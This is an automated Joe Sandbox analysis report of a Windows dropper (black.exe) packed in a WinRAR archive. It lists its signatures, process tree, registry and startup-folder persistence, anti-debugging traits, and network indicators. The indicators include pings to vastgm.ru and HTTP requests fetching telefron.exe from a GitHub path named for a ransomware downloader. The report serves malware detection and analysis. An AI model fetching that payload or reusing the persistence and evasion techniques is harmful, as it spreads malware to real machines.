Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Y5kEUsYDFr.exe

Overview

General Information

Sample name:Y5kEUsYDFr.exe
renamed because original name is a hash value
Original sample name:ec773998b0078cc58100fdb4d27dc3f4.exe
Analysis ID:1571211
MD5:ec773998b0078cc58100fdb4d27dc3f4
SHA1:491a3d8d31c9eabcd8f6236203c54daa12031aab
SHA256:ff4fd58c1db6e88c768665983b2212e53204d7a07b3769883882179d34258933
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the startup folder
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Uses ping.exe to check the status of other devices and networks
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • Y5kEUsYDFr.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\Y5kEUsYDFr.exe" MD5: EC773998B0078CC58100FDB4D27DC3F4)
    • black.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe" MD5: 09929B04B0C29E2722009F49FAF7183C)
      • cmd.exe (PID: 1308 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 1460 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
      • cmd.exe (PID: 2600 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 3168 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
  • black.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Roaming\black.exe" MD5: 09929B04B0C29E2722009F49FAF7183C)
    • cmd.exe (PID: 5848 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3064 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
    • cmd.exe (PID: 5688 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1168 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
  • Acrobat.exe (PID: 4936 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 2208 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 3844 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\black.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe, ProcessId: 6360, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\black
Sigma detected: Startup Folder File Write
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe, ProcessId: 6360, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeAvira: detection malicious, Label: HEUR/AGEN.1310014
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeAvira: detection malicious, Label: HEUR/AGEN.1310014
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeAvira: detection malicious, Label: HEUR/AGEN.1310014
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\black.exeReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: Y5kEUsYDFr.exeReversingLabs: Detection: 47%
Source: Y5kEUsYDFr.exeVirustotal: Detection: 60%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: Y5kEUsYDFr.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: Y5kEUsYDFr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Y5kEUsYDFr.exe
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9D40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9D40BC
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9EB190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9FFCA0 FindFirstFileExA,0_2_00007FF6CA9FFCA0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh1_2_023D9A58
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then jmp 023D29E9h1_2_023D28F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then jmp 023D29E9h1_2_023D2908
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh1_2_023D9A4C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-08h]1_2_02501288
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]1_2_02500740
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 715E6120h1_2_02500B18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then push dword ptr [ebp-04h]1_2_02500818
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]1_2_025010A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 715E60BCh1_2_02500A74
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 715E60BCh1_2_02500A78
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 715E524Ch1_2_02501620
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 71631468h1_2_025012E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_02500318
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then push dword ptr [ebp-04h]1_2_02501700
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 715E6120h1_2_02500B01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_02500F28
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, 7162D5CCh1_2_025013D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_02500BFD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_02500F9E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_02500FB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_025003A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_02500C00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]1_2_025014F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]1_2_02501085
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 4x nop then push dword ptr [ebp-0Ch]1_2_025004A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 715E6120h7_2_046C0870
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]7_2_046C1298
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]7_2_046C0740
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-08h]7_2_046C0F38
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 715E6120h7_2_046C0868
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0C65
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 7162D5CCh7_2_046C1065
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]7_2_046C127D
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then push dword ptr [ebp-04h]7_2_046C1440
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then push dword ptr [ebp-04h]7_2_046C1421
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0CED
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C02F9
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then push dword ptr [ebp-0Ch]7_2_046C04A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0C80
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 7162D5CCh7_2_046C1080
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then push dword ptr [ebp-0Ch]7_2_046C0481
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 715E524Ch7_2_046C1360
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 71631468h7_2_046C0F75
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 715E524Ch7_2_046C1341
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0958
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]7_2_046C0725
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-08h]7_2_046C0F27
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0939
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0D08
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0318
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 715E60BCh7_2_046C07D0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C11A8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C03A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 715E60BCh7_2_046C07B5
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C118D
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]7_2_046C0385
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov ecx, 71631468h7_2_046C0F90
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh7_2_04BD8C90
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh7_2_04BD8C84
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then jmp 04BD29E9h7_2_04BD28F1
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 4x nop then jmp 04BD29E9h7_2_04BD2908

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: global trafficHTTP traffic detected: GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 69.192.108.223 69.192.108.223
Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
Source: Joe Sandbox ViewASN Name: DDOS-GUARDRU DDOS-GUARDRU
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.108.223
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: vastgm.ru
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 09 Dec 2024 06:03:47 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgrade
Source: black.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmp, black.exe, 00000007.00000002.4147454579.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2D85F72862B55C4EADD9E66E06947F3D0.23.drString found in binary or memory: http://x1.i.lencr.org/
Source: black.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: black.exe.0.drStatic PE information: section name: .|]Y
Source: black.exe.0.drStatic PE information: section name: .z~z
Source: black.exe.0.drStatic PE information: section name: .%?T
Source: black.exe.1.drStatic PE information: section name: .|]Y
Source: black.exe.1.drStatic PE information: section name: .z~z
Source: black.exe.1.drStatic PE information: section name: .%?T
Source: black.exe0.1.drStatic PE information: section name: .|]Y
Source: black.exe0.1.drStatic PE information: section name: .z~z
Source: black.exe0.1.drStatic PE information: section name: .%?T
Source: C:\Users\user\AppData\Roaming\black.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC270 NtCreateSection,1_2_023AC270
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB660 NtClose,1_2_023AB660
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC660 NtQueryVolumeInformationFile,1_2_023AC660
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB750 NtProtectVirtualMemory,1_2_023AB750
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC3B8 NtQuerySystemInformation,1_2_023AC3B8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC788 NtDeviceIoControlFile,1_2_023AC788
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB420 NtQueryInformationProcess,1_2_023AB420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023ABC80 NtAllocateVirtualMemory,1_2_023ABC80
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC4D0 NtMapViewOfSection,1_2_023AC4D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC138 NtOpenFile,1_2_023AC138
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB548 NtSetInformationThread,1_2_023AB548
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC268 NtCreateSection,1_2_023AC268
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB658 NtClose,1_2_023AB658
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC659 NtQueryVolumeInformationFile,1_2_023AC659
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB74A NtProtectVirtualMemory,1_2_023AB74A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC3B0 NtQuerySystemInformation,1_2_023AC3B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC780 NtDeviceIoControlFile,1_2_023AC780
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB418 NtQueryInformationProcess,1_2_023AB418
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023ABC79 NtAllocateVirtualMemory,1_2_023ABC79
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC4C8 NtMapViewOfSection,1_2_023AC4C8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AC130 NtOpenFile,1_2_023AC130
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AB546 NtSetInformationThread,1_2_023AB546
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D6D68 NtSetInformationProcess,1_2_023D6D68
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D7290 NtSetInformationProcess,1_2_023D7290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D7309 NtSetInformationProcess,1_2_023D7309
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BABC80 NtAllocateVirtualMemory,7_2_04BABC80
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC4D0 NtMapViewOfSection,7_2_04BAC4D0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB420 NtQueryInformationProcess,7_2_04BAB420
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC138 NtOpenFile,7_2_04BAC138
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB548 NtSetInformationThread,7_2_04BAB548
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC270 NtCreateSection,7_2_04BAC270
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB660 NtClose,7_2_04BAB660
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC660 NtQueryVolumeInformationFile,7_2_04BAC660
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC3B8 NtQuerySystemInformation,7_2_04BAC3B8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC788 NtDeviceIoControlFile,7_2_04BAC788
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB750 NtProtectVirtualMemory,7_2_04BAB750
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC4C8 NtMapViewOfSection,7_2_04BAC4C8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB418 NtQueryInformationProcess,7_2_04BAB418
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BABC79 NtAllocateVirtualMemory,7_2_04BABC79
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC130 NtOpenFile,7_2_04BAC130
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB540 NtSetInformationThread,7_2_04BAB540
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC268 NtCreateSection,7_2_04BAC268
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB658 NtClose,7_2_04BAB658
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC659 NtQueryVolumeInformationFile,7_2_04BAC659
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC3B0 NtQuerySystemInformation,7_2_04BAC3B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAC780 NtDeviceIoControlFile,7_2_04BAC780
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAB749 NtProtectVirtualMemory,7_2_04BAB749
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exeCode function: 0_2_00007FF6CA9CC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9CC2F0
